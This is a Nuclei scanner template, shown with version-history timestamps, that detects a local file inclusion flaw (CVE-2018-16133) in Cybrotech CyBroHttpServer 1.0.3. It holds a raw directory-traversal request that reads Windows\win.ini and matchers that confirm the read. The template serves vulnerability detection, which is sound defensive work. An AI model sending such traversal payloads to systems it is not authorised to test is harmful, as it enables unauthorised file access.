2021-12-01 02:26:56 +00:00
id : CVE-2018-16133
2022-04-22 10:38:41 +00:00
2021-12-01 02:26:56 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
2021-12-01 02:26:56 +00:00
author : 0x_Akoko
severity : medium
2022-07-26 13:45:11 +00:00
description : Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
2021-12-01 02:26:56 +00:00
reference :
- https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
2021-12-01 13:45:56 +00:00
- http://www.cybrotech.com/
2022-05-17 09:18:12 +00:00
- https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-16133
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-12-01 02:26:56 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2018-16133
cwe-id : CWE-22
2024-01-29 17:11:14 +00:00
epss-score : 0.03629
epss-percentile : 0.90789
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cybrotech
product : cybrohttpserver
2024-01-14 09:21:50 +00:00
tags : cve2018,cve,lfi,packetstorm,cybrotech
2021-12-01 02:26:56 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-01 13:45:56 +00:00
- raw :
2021-12-03 05:22:45 +00:00
- |+
2021-12-01 13:45:56 +00:00
GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host : {{Hostname}}
2021-12-01 02:26:56 +00:00
2021-12-01 13:45:56 +00:00
unsafe : true
2021-12-01 02:26:56 +00:00
matchers :
- type : word
part : body
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2024-01-30 06:46:18 +00:00
# digest: 4a0a00473045022100d5f2349395d7e18958ea5b9c9d28b05d55ab15715981e013f123d65d4de34d7302202329f9b7a950438d6c57a758755f711ea30247ce56f4d0babb2e1ef3d89ca219:922c64590222798bb761d5b6d8e72950